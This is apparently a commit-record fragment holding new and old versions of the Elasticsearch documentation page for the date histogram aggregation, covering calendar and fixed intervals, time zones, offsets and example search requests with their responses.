}\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\/\/ TEST[catch:bad_request]\n\n[source,js]\n--------------------------------------------------\n{\n \"error\" : {\n \"root_cause\" : [...],\n \"type\" : \"x_content_parse_exception\",\n \"reason\" : \"[1:82] [date_histogram] failed to parse field [calendar_interval]\",\n \"caused_by\" : {\n \"type\" : \"illegal_argument_exception\",\n \"reason\" : \"The supplied interval [2d] could not be parsed as a calendar interval.\",\n \"stack_trace\" : \"java.lang.IllegalArgumentException: The supplied interval [2d] could not be parsed as a calendar interval.\"\n }\n }\n}\n\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n[[fixed_intervals]]\n===== Fixed intervals\n\nFixed intervals are configured with the `fixed_interval` parameter.\n\nIn contrast to calendar-aware intervals, fixed intervals are a fixed number of SI\nunits and never deviate, regardless of where they fall on the calendar. One second\nis always composed of 1000ms. This allows fixed intervals to be specified in\nany multiple of the supported units.\n\nHowever, it means fixed intervals cannot express other units such as months,\nsince the duration of a month is not a fixed quantity. Attempting to specify\na calendar interval like month or quarter will throw an exception.\n\nThe accepted units for fixed intervals are:\n\nmilliseconds (ms) ::\n\nseconds (s) ::\nDefined as 1000 milliseconds each\n\nminutes (m) ::\nAll minutes begin at 00 seconds.\nDefined as 60 seconds each (60,000 milliseconds)\n\nhours (h) ::\nAll hours begin at 00 minutes and 00 seconds.\nDefined as 60 minutes each (3,600,000 milliseconds)\n\ndays (d) ::\nAll days begin at the earliest possible time, which is usually 00:00:00\n(midnight).\nDefined as 24 hours (86,400,000 milliseconds)\n\n[[fixed_interval_examples]]\n===== Fixed interval examples\n\nIf we try to recreate the \"month\" `calendar_interval` from earlier, we can approximate that with\n30 fixed days:\n\n[source,console,id=datehistogram-aggregation-fixed-interval-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"fixed_interval\" : \"30d\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nBut if we try to use a calendar unit that is not supported, such as weeks, we'll get an exception:\n\n[source,console,id=datehistogram-aggregation-fixed-interval-unsupported-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"fixed_interval\" : \"2w\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\/\/ TEST[catch:bad_request]\n\n[source,js]\n--------------------------------------------------\n{\n \"error\" : {\n \"root_cause\" : [...],\n \"type\" : \"x_content_parse_exception\",\n \"reason\" : \"[1:82] [date_histogram] failed to parse field [fixed_interval]\",\n \"caused_by\" : {\n \"type\" : \"illegal_argument_exception\",\n \"reason\" : \"failed to parse setting [date_histogram.fixedInterval] with value [2w] as a time value: unit is missing or unrecognized\",\n \"stack_trace\" : \"java.lang.IllegalArgumentException: failed to parse setting [date_histogram.fixedInterval] with value [2w] as a time value: unit is missing or unrecognized\"\n }\n }\n}\n\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n===== Notes\n\nIn all cases, when the specified end time does not exist, the actual end time is\nthe closest available time after the specified end.\n\nWidely distributed applications must also consider vagaries such as countries that\nstart and stop daylight savings time at 12:01 A.M., so end up with one minute of \nSunday followed by an additional 59 minutes of Saturday once a year, and countries\nthat decide to move across the international date line. Situations like\nthat can make irregular timezone offsets seem easy. \n\nAs always, rigorous testing, especially around time-change events, will ensure\nthat your time interval specification is\nwhat you intend it to be.\n\nWARNING:\nTo avoid unexpected results, all connected servers and clients must sync to a\nreliable network time service.\n\nNOTE: fractional time values are not supported, but you can address this by\nshifting to another time unit (e.g., `1.5h` could instead be specified as `90m`).\n\nNOTE: You can also specify time values using abbreviations supported by\n<<time-units,time units>> parsing.\n\n===== Keys\n\nInternally, a date is represented as a 64 bit number representing a timestamp\nin milliseconds-since-the-epoch (01\/01\/1970 midnight UTC). These timestamps are\nreturned as the ++key++ name of the bucket. The `key_as_string` is the same\ntimestamp converted to a formatted\ndate string using the `format` parameter specification:\n\nTIP: If you don't specify `format`, the first date\n<<mapping-date-format,format>> specified in the field mapping is used.\n\n[source,console,id=datehistogram-aggregation-format-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"1M\",\n \"format\" : \"yyyy-MM-dd\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\n<1> Supports expressive date <<date-format-pattern,format pattern>>\n\nResponse:\n\n[source,console-result]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sales_over_time\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-01-01\",\n \"key\": 1420070400000,\n \"doc_count\": 3\n },\n {\n \"key_as_string\": \"2015-02-01\",\n \"key\": 1422748800000,\n \"doc_count\": 2\n },\n {\n \"key_as_string\": \"2015-03-01\",\n \"key\": 1425168000000,\n \"doc_count\": 2\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n===== Timezone\n\nDate-times are stored in Elasticsearch in UTC. By default, all bucketing and\nrounding is also done in UTC. Use the `time_zone` parameter to indicate\nthat bucketing should use a different timezone.\n\nYou can specify timezones as either an ISO 8601 UTC offset (e.g. `+01:00` or\n`-08:00`) or as a timezone ID as specified in the IANA timezone database,\nsuch as`America\/Los_Angeles`.\n\nConsider the following example:\n\n[source,console,id=datehistogram-aggregation-timezone-example]\n---------------------------------\nPUT my_index\/_doc\/1?refresh\n{\n \"date\": \"2015-10-01T00:30:00Z\"\n}\n\nPUT my_index\/_doc\/2?refresh\n{\n \"date\": \"2015-10-01T01:30:00Z\"\n}\n\nGET my_index\/_search?size=0\n{\n \"aggs\": {\n \"by_day\": {\n \"date_histogram\": {\n \"field\": \"date\",\n \"calendar_interval\": \"day\"\n }\n }\n }\n}\n---------------------------------\n\nIf you don't specify a timezone, UTC is used. This would result in both of these\ndocuments being placed into the same day bucket, which starts at midnight UTC\non 1 October 2015:\n\n[source,console-result]\n---------------------------------\n{\n ...\n \"aggregations\": {\n \"by_day\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-10-01T00:00:00.000Z\",\n \"key\": 1443657600000,\n \"doc_count\": 2\n }\n ]\n }\n }\n}\n---------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\nIf you specify a `time_zone` of `-01:00`, midnight in that timezone is one hour\nbefore midnight UTC:\n\n[source,console]\n---------------------------------\nGET my_index\/_search?size=0\n{\n \"aggs\": {\n \"by_day\": {\n \"date_histogram\": {\n \"field\": \"date\",\n \"calendar_interval\": \"day\",\n \"time_zone\": \"-01:00\"\n }\n }\n }\n}\n---------------------------------\n\/\/ TEST[continued]\n\nNow the first document falls into the bucket for 30 September 2015, while the\nsecond document falls into the bucket for 1 October 2015:\n\n[source,console-result]\n---------------------------------\n{\n ...\n \"aggregations\": {\n \"by_day\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-09-30T00:00:00.000-01:00\", <1>\n \"key\": 1443574800000,\n \"doc_count\": 1\n },\n {\n \"key_as_string\": \"2015-10-01T00:00:00.000-01:00\", <1>\n \"key\": 1443661200000,\n \"doc_count\": 1\n }\n ]\n }\n }\n}\n---------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n<1> The `key_as_string` value represents midnight on each day\n in the specified timezone.\n\nWARNING: When using time zones that follow DST (daylight savings time) changes,\nbuckets close to the moment when those changes happen can have slightly different\nsizes than you would expect from the used `interval`.\nFor example, consider a DST start in the `CET` time zone: on 27 March 2016 at 2am,\nclocks were turned forward 1 hour to 3am local time. If you use `day` as `interval`,\nthe bucket covering that day will only hold data for 23 hours instead of the usual\n24 hours for other buckets. The same is true for shorter intervals, like 12h,\nwhere you'll have only a 11h bucket on the morning of 27 March when the DST shift\nhappens.\n\n[[search-aggregations-bucket-datehistogram-offset]]\n===== Offset\n\n\/\/ tag::offset-explanation[]\nUse the `offset` parameter to change the start value of each bucket by the\nspecified positive (`+`) or negative offset (`-`) duration, such as `1h` for\nan hour, or `1d` for a day. See <<time-units>> for more possible time\nduration options.\n\nFor example, when using an interval of `day`, each bucket runs from midnight\nto midnight. Setting the `offset` parameter to `+6h` changes each bucket\nto run from 6am to 6am:\n\/\/ end::offset-explanation[]\n\n[source,console,id=datehistogram-aggregation-offset-example]\n-----------------------------\nPUT my_index\/_doc\/1?refresh\n{\n \"date\": \"2015-10-01T05:30:00Z\"\n}\n\nPUT my_index\/_doc\/2?refresh\n{\n \"date\": \"2015-10-01T06:30:00Z\"\n}\n\nGET my_index\/_search?size=0\n{\n \"aggs\": {\n \"by_day\": {\n \"date_histogram\": {\n \"field\": \"date\",\n \"calendar_interval\": \"day\",\n \"offset\": \"+6h\"\n }\n }\n }\n}\n-----------------------------\n\n\/\/ tag::offset-result-intro[]\nInstead of a single bucket starting at midnight, the above request groups the\ndocuments into buckets starting at 6am:\n\/\/ end::offset-result-intro[]\n\n[source,console-result]\n-----------------------------\n{\n ...\n \"aggregations\": {\n \"by_day\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-09-30T06:00:00.000Z\",\n \"key\": 1443592800000,\n \"doc_count\": 1\n },\n {\n \"key_as_string\": \"2015-10-01T06:00:00.000Z\",\n \"key\": 1443679200000,\n \"doc_count\": 1\n }\n ]\n }\n }\n}\n-----------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n\/\/ tag::offset-note[]\nNOTE: The start `offset` of each bucket is calculated after `time_zone`\nadjustments have been made.\n\/\/ end::offset-note[]\n\n===== Keyed Response\n\nSetting the `keyed` flag to `true` associates a unique string key with each\nbucket and returns the ranges as a hash rather than an array:\n\n[source,console,id=datehistogram-aggregation-keyed-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"1M\",\n \"format\" : \"yyyy-MM-dd\",\n \"keyed\": true\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nResponse:\n\n[source,console-result]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sales_over_time\": {\n \"buckets\": {\n \"2015-01-01\": {\n \"key_as_string\": \"2015-01-01\",\n \"key\": 1420070400000,\n \"doc_count\": 3\n },\n \"2015-02-01\": {\n \"key_as_string\": \"2015-02-01\",\n \"key\": 1422748800000,\n \"doc_count\": 2\n },\n \"2015-03-01\": {\n \"key_as_string\": \"2015-03-01\",\n \"key\": 1425168000000,\n \"doc_count\": 2\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n===== Scripts\n\nAs with the normal <<search-aggregations-bucket-histogram-aggregation,histogram>>,\nboth document-level scripts and\nvalue-level scripts are supported. You can control the order of the returned\nbuckets using the `order`\nsettings and filter the returned buckets based on a `min_doc_count` setting\n(by default all buckets between the first\nbucket that matches documents and the last one are returned). This histogram\nalso supports the `extended_bounds`\nsetting, which enables extending the bounds of the histogram beyond the data\nitself. For more information, see\n<<search-aggregations-bucket-histogram-aggregation-extended-bounds,`Extended Bounds`>>.\n\n===== Missing value\n\nThe `missing` parameter defines how to treat documents that are missing a value.\nBy default, they are ignored, but it is also possible to treat them as if they\nhave a value.\n\n[source,console,id=datehistogram-aggregation-missing-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sale_date\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\": \"year\",\n \"missing\": \"2000\/01\/01\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\n<1> Documents without a value in the `publish_date` field will fall into the\nsame bucket as documents that have the value `2000-01-01`.\n\n===== Order\n\nBy default the returned buckets are sorted by their `key` ascending, but you can\ncontrol the order using\nthe `order` setting. This setting supports the same `order` functionality as\n<<search-aggregations-bucket-terms-aggregation-order,`Terms Aggregation`>>.\n\n===== Using a script to aggregate by day of the week\n\nWhen you need to aggregate the results by day of the week, use a script that \nreturns the day of the week:\n\n\n[source,console,id=datehistogram-aggregation-script-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\": {\n \"dayOfWeek\": {\n \"terms\": {\n \"script\": {\n \"lang\": \"painless\",\n \"source\": \"doc['date'].value.dayOfWeekEnum.value\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nResponse:\n\n[source,console-result]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"dayOfWeek\": {\n \"doc_count_error_upper_bound\": 0,\n \"sum_other_doc_count\": 0,\n \"buckets\": [\n {\n \"key\": \"7\",\n \"doc_count\": 4\n },\n {\n \"key\": \"4\",\n \"doc_count\": 3\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\nThe response will contain all the buckets having the relative day of\nthe week as key : 1 for Monday, 2 for Tuesday... 7 for Sunday.\n","old_contents":"[[search-aggregations-bucket-datehistogram-aggregation]]\n=== Date histogram aggregation\n\nThis multi-bucket aggregation is similar to the normal\n<<search-aggregations-bucket-histogram-aggregation,histogram>>, but it can\nonly be used with date or date range values. Because dates are represented internally in \nElasticsearch as long values, it is possible, but not as accurate, to use the\nnormal `histogram` on dates as well. The main difference in the two APIs is\nthat here the interval can be specified using date\/time expressions. Time-based\ndata requires special support because time-based intervals are not always a\nfixed length.\n\n[[calendar_and_fixed_intervals]]\n==== Calendar and fixed intervals\n\nWhen configuring a date histogram aggregation, the interval can be specified\nin two manners: calendar-aware time intervals, and fixed time intervals.\n\nCalendar-aware intervals understand that daylight savings changes the length\nof specific days, months have different amounts of days, and leap seconds can\nbe tacked onto a particular year.\n\nFixed intervals are, by contrast, always multiples of SI units and do not change\nbased on calendaring context.\n\n[NOTE]\n.Combined `interval` field is deprecated\n==================================\ndeprecated[7.2, `interval` field is deprecated] Historically both calendar and fixed\nintervals were configured in a single `interval` field, which led to confusing\nsemantics. Specifying `1d` would be assumed as a calendar-aware time,\nwhereas `2d` would be interpreted as fixed time. To get \"one day\" of fixed time,\nthe user would need to specify the next smaller unit (in this case, `24h`).\n\nThis combined behavior was often unknown to users, and even when knowledgeable about\nthe behavior it was difficult to use and confusing.\n\nThis behavior has been deprecated in favor of two new, explicit fields: `calendar_interval`\nand `fixed_interval`.\n\nBy forcing a choice between calendar and intervals up front, the semantics of the interval\nare clear to the user immediately and there is no ambiguity. The old `interval` field\nwill be removed in the future.\n==================================\n\n[[calendar_intervals]]\n===== Calendar intervals\n\nCalendar-aware intervals are configured with the `calendar_interval` parameter.\nCalendar intervals can only be specified in \"singular\" quantities of the unit\n(`1d`, `1M`, etc). Multiples, such as `2d`, are not supported and will throw an exception.\n\nThe accepted units for calendar intervals are:\n\nminute (`m`, `1m`) ::\nAll minutes begin at 00 seconds.\n\nOne minute is the interval between 00 seconds of the first minute and 00\nseconds of the following minute in the specified timezone, compensating for any\nintervening leap seconds, so that the number of minutes and seconds past the\nhour is the same at the start and end.\n\nhour (`h`, `1h`) ::\nAll hours begin at 00 minutes and 00 seconds.\n\nOne hour (1h) is the interval between 00:00 minutes of the first hour and 00:00\nminutes of the following hour in the specified timezone, compensating for any\nintervening leap seconds, so that the number of minutes and seconds past the hour\nis the same at the start and end.\n\n\nday (`d`, `1d`) ::\nAll days begin at the earliest possible time, which is usually 00:00:00\n(midnight).\n\nOne day (1d) is the interval between the start of the day and the start of\nof the following day in the specified timezone, compensating for any intervening\ntime changes.\n\nweek (`w`, `1w`) ::\n\nOne week is the interval between the start day_of_week:hour:minute:second\nand the same day of the week and time of the following week in the specified\ntimezone.\n\nmonth (`M`, `1M`) ::\n\nOne month is the interval between the start day of the month and time of\nday and the same day of the month and time of the following month in the specified\ntimezone, so that the day of the month and time of day are the same at the start\nand end.\n\nquarter (`q`, `1q`) ::\n\nOne quarter (1q) is the interval between the start day of the month and\ntime of day and the same day of the month and time of day three months later,\nso that the day of the month and time of day are the same at the start and end. +\n\nyear (`y`, `1y`) ::\n\nOne year (1y) is the interval between the start day of the month and time of\nday and the same day of the month and time of day the following year in the\nspecified timezone, so that the date and time are the same at the start and end. +\n\n[[calendar_interval_examples]]\n===== Calendar interval examples\nAs an example, here is an aggregation requesting bucket intervals of a month in calendar time:\n\n[source,console,id=datehistogram-aggregation-calendar-interval-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"month\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nIf you attempt to use multiples of calendar units, the aggregation will fail because only\nsingular calendar units are supported:\n\n[source,console,id=datehistogram-aggregation-calendar-interval-multiples-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"2d\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\/\/ TEST[catch:bad_request]\n\n[source,js]\n--------------------------------------------------\n{\n \"error\" : {\n \"root_cause\" : [...],\n \"type\" : \"x_content_parse_exception\",\n \"reason\" : \"[1:82] [date_histogram] failed to parse field [calendar_interval]\",\n \"caused_by\" : {\n \"type\" : \"illegal_argument_exception\",\n \"reason\" : \"The supplied interval [2d] could not be parsed as a calendar interval.\",\n \"stack_trace\" : \"java.lang.IllegalArgumentException: The supplied interval [2d] could not be parsed as a calendar interval.\"\n }\n }\n}\n\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n[[fixed_intervals]]\n===== Fixed intervals\n\nFixed intervals are configured with the `fixed_interval` parameter.\n\nIn contrast to calendar-aware intervals, fixed intervals are a fixed number of SI\nunits and never deviate, regardless of where they fall on the calendar. One second\nis always composed of 1000ms. This allows fixed intervals to be specified in\nany multiple of the supported units.\n\nHowever, it means fixed intervals cannot express other units such as months,\nsince the duration of a month is not a fixed quantity. Attempting to specify\na calendar interval like month or quarter will throw an exception.\n\nThe accepted units for fixed intervals are:\n\nmilliseconds (ms) ::\n\nseconds (s) ::\nDefined as 1000 milliseconds each\n\nminutes (m) ::\nAll minutes begin at 00 seconds.\n\nDefined as 60 seconds each (60,000 milliseconds)\n\nhours (h) ::\nAll hours begin at 00 minutes and 00 seconds.\nDefined as 60 minutes each (3,600,000 milliseconds)\n\ndays (d) ::\nAll days begin at the earliest possible time, which is usually 00:00:00\n(midnight).\n\nDefined as 24 hours (86,400,000 milliseconds)\n\n[[fixed_interval_examples]]\n===== Fixed interval examples\n\nIf we try to recreate the \"month\" `calendar_interval` from earlier, we can approximate that with\n30 fixed days:\n\n[source,console,id=datehistogram-aggregation-fixed-interval-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"fixed_interval\" : \"30d\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nBut if we try to use a calendar unit that is not supported, such as weeks, we'll get an exception:\n\n[source,console,id=datehistogram-aggregation-fixed-interval-unsupported-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"fixed_interval\" : \"2w\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\/\/ TEST[catch:bad_request]\n\n[source,js]\n--------------------------------------------------\n{\n \"error\" : {\n \"root_cause\" : [...],\n \"type\" : \"x_content_parse_exception\",\n \"reason\" : \"[1:82] [date_histogram] failed to parse field [fixed_interval]\",\n \"caused_by\" : {\n \"type\" : \"illegal_argument_exception\",\n \"reason\" : \"failed to parse setting [date_histogram.fixedInterval] with value [2w] as a time value: unit is missing or unrecognized\",\n \"stack_trace\" : \"java.lang.IllegalArgumentException: failed to parse setting [date_histogram.fixedInterval] with value [2w] as a time value: unit is missing or unrecognized\"\n }\n }\n}\n\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n===== Notes\n\nIn all cases, when the specified end time does not exist, the actual end time is\nthe closest available time after the specified end.\n\nWidely distributed applications must also consider vagaries such as countries that\nstart and stop daylight savings time at 12:01 A.M., so end up with one minute of \nSunday followed by an additional 59 minutes of Saturday once a year, and countries\nthat decide to move across the international date line. Situations like\nthat can make irregular timezone offsets seem easy. \n\nAs always, rigorous testing, especially around time-change events, will ensure\nthat your time interval specification is\nwhat you intend it to be.\n\nWARNING:\nTo avoid unexpected results, all connected servers and clients must sync to a\nreliable network time service.\n\nNOTE: fractional time values are not supported, but you can address this by\nshifting to another time unit (e.g., `1.5h` could instead be specified as `90m`).\n\nNOTE: You can also specify time values using abbreviations supported by\n<<time-units,time units>> parsing.\n\n===== Keys\n\nInternally, a date is represented as a 64 bit number representing a timestamp\nin milliseconds-since-the-epoch (01\/01\/1970 midnight UTC). These timestamps are\nreturned as the ++key++ name of the bucket. The `key_as_string` is the same\ntimestamp converted to a formatted\ndate string using the `format` parameter specification:\n\nTIP: If you don't specify `format`, the first date\n<<mapping-date-format,format>> specified in the field mapping is used.\n\n[source,console,id=datehistogram-aggregation-format-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"1M\",\n \"format\" : \"yyyy-MM-dd\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\n<1> Supports expressive date <<date-format-pattern,format pattern>>\n\nResponse:\n\n[source,console-result]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sales_over_time\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-01-01\",\n \"key\": 1420070400000,\n \"doc_count\": 3\n },\n {\n \"key_as_string\": \"2015-02-01\",\n \"key\": 1422748800000,\n \"doc_count\": 2\n },\n {\n \"key_as_string\": \"2015-03-01\",\n \"key\": 1425168000000,\n \"doc_count\": 2\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n===== Timezone\n\nDate-times are stored in Elasticsearch in UTC. By default, all bucketing and\nrounding is also done in UTC. Use the `time_zone` parameter to indicate\nthat bucketing should use a different timezone.\n\nYou can specify timezones as either an ISO 8601 UTC offset (e.g. `+01:00` or\n`-08:00`) or as a timezone ID as specified in the IANA timezone database,\nsuch as`America\/Los_Angeles`.\n\nConsider the following example:\n\n[source,console,id=datehistogram-aggregation-timezone-example]\n---------------------------------\nPUT my_index\/_doc\/1?refresh\n{\n \"date\": \"2015-10-01T00:30:00Z\"\n}\n\nPUT my_index\/_doc\/2?refresh\n{\n \"date\": \"2015-10-01T01:30:00Z\"\n}\n\nGET my_index\/_search?size=0\n{\n \"aggs\": {\n \"by_day\": {\n \"date_histogram\": {\n \"field\": \"date\",\n \"calendar_interval\": \"day\"\n }\n }\n }\n}\n---------------------------------\n\nIf you don't specify a timezone, UTC is used. This would result in both of these\ndocuments being placed into the same day bucket, which starts at midnight UTC\non 1 October 2015:\n\n[source,console-result]\n---------------------------------\n{\n ...\n \"aggregations\": {\n \"by_day\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-10-01T00:00:00.000Z\",\n \"key\": 1443657600000,\n \"doc_count\": 2\n }\n ]\n }\n }\n}\n---------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\nIf you specify a `time_zone` of `-01:00`, midnight in that timezone is one hour\nbefore midnight UTC:\n\n[source,console]\n---------------------------------\nGET my_index\/_search?size=0\n{\n \"aggs\": {\n \"by_day\": {\n \"date_histogram\": {\n \"field\": \"date\",\n \"calendar_interval\": \"day\",\n \"time_zone\": \"-01:00\"\n }\n }\n }\n}\n---------------------------------\n\/\/ TEST[continued]\n\nNow the first document falls into the bucket for 30 September 2015, while the\nsecond document falls into the bucket for 1 October 2015:\n\n[source,console-result]\n---------------------------------\n{\n ...\n \"aggregations\": {\n \"by_day\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-09-30T00:00:00.000-01:00\", <1>\n \"key\": 1443574800000,\n \"doc_count\": 1\n },\n {\n \"key_as_string\": \"2015-10-01T00:00:00.000-01:00\", <1>\n \"key\": 1443661200000,\n \"doc_count\": 1\n }\n ]\n }\n }\n}\n---------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n<1> The `key_as_string` value represents midnight on each day\n in the specified timezone.\n\nWARNING: When using time zones that follow DST (daylight savings time) changes,\nbuckets close to the moment when those changes happen can have slightly different\nsizes than you would expect from the used `interval`.\nFor example, consider a DST start in the `CET` time zone: on 27 March 2016 at 2am,\nclocks were turned forward 1 hour to 3am local time. If you use `day` as `interval`,\nthe bucket covering that day will only hold data for 23 hours instead of the usual\n24 hours for other buckets. The same is true for shorter intervals, like 12h,\nwhere you'll have only a 11h bucket on the morning of 27 March when the DST shift\nhappens.\n\n[[search-aggregations-bucket-datehistogram-offset]]\n===== Offset\n\n\/\/ tag::offset-explanation[]\nUse the `offset` parameter to change the start value of each bucket by the\nspecified positive (`+`) or negative offset (`-`) duration, such as `1h` for\nan hour, or `1d` for a day. See <<time-units>> for more possible time\nduration options.\n\nFor example, when using an interval of `day`, each bucket runs from midnight\nto midnight. Setting the `offset` parameter to `+6h` changes each bucket\nto run from 6am to 6am:\n\/\/ end::offset-explanation[]\n\n[source,console,id=datehistogram-aggregation-offset-example]\n-----------------------------\nPUT my_index\/_doc\/1?refresh\n{\n \"date\": \"2015-10-01T05:30:00Z\"\n}\n\nPUT my_index\/_doc\/2?refresh\n{\n \"date\": \"2015-10-01T06:30:00Z\"\n}\n\nGET my_index\/_search?size=0\n{\n \"aggs\": {\n \"by_day\": {\n \"date_histogram\": {\n \"field\": \"date\",\n \"calendar_interval\": \"day\",\n \"offset\": \"+6h\"\n }\n }\n }\n}\n-----------------------------\n\n\/\/ tag::offset-result-intro[]\nInstead of a single bucket starting at midnight, the above request groups the\ndocuments into buckets starting at 6am:\n\/\/ end::offset-result-intro[]\n\n[source,console-result]\n-----------------------------\n{\n ...\n \"aggregations\": {\n \"by_day\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-09-30T06:00:00.000Z\",\n \"key\": 1443592800000,\n \"doc_count\": 1\n },\n {\n \"key_as_string\": \"2015-10-01T06:00:00.000Z\",\n \"key\": 1443679200000,\n \"doc_count\": 1\n }\n ]\n }\n }\n}\n-----------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n\/\/ tag::offset-note[]\nNOTE: The start `offset` of each bucket is calculated after `time_zone`\nadjustments have been made.\n\/\/ end::offset-note[]\n\n===== Keyed Response\n\nSetting the `keyed` flag to `true` associates a unique string key with each\nbucket and returns the ranges as a hash rather than an array:\n\n[source,console,id=datehistogram-aggregation-keyed-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"1M\",\n \"format\" : \"yyyy-MM-dd\",\n \"keyed\": true\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nResponse:\n\n[source,console-result]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sales_over_time\": {\n \"buckets\": {\n \"2015-01-01\": {\n \"key_as_string\": \"2015-01-01\",\n \"key\": 1420070400000,\n \"doc_count\": 3\n },\n \"2015-02-01\": {\n \"key_as_string\": \"2015-02-01\",\n \"key\": 1422748800000,\n \"doc_count\": 2\n },\n \"2015-03-01\": {\n \"key_as_string\": \"2015-03-01\",\n \"key\": 1425168000000,\n \"doc_count\": 2\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n===== Scripts\n\nAs with the normal <<search-aggregations-bucket-histogram-aggregation,histogram>>,\nboth document-level scripts and\nvalue-level scripts are supported. You can control the order of the returned\nbuckets using the `order`\nsettings and filter the returned buckets based on a `min_doc_count` setting\n(by default all buckets between the first\nbucket that matches documents and the last one are returned). This histogram\nalso supports the `extended_bounds`\nsetting, which enables extending the bounds of the histogram beyond the data\nitself. For more information, 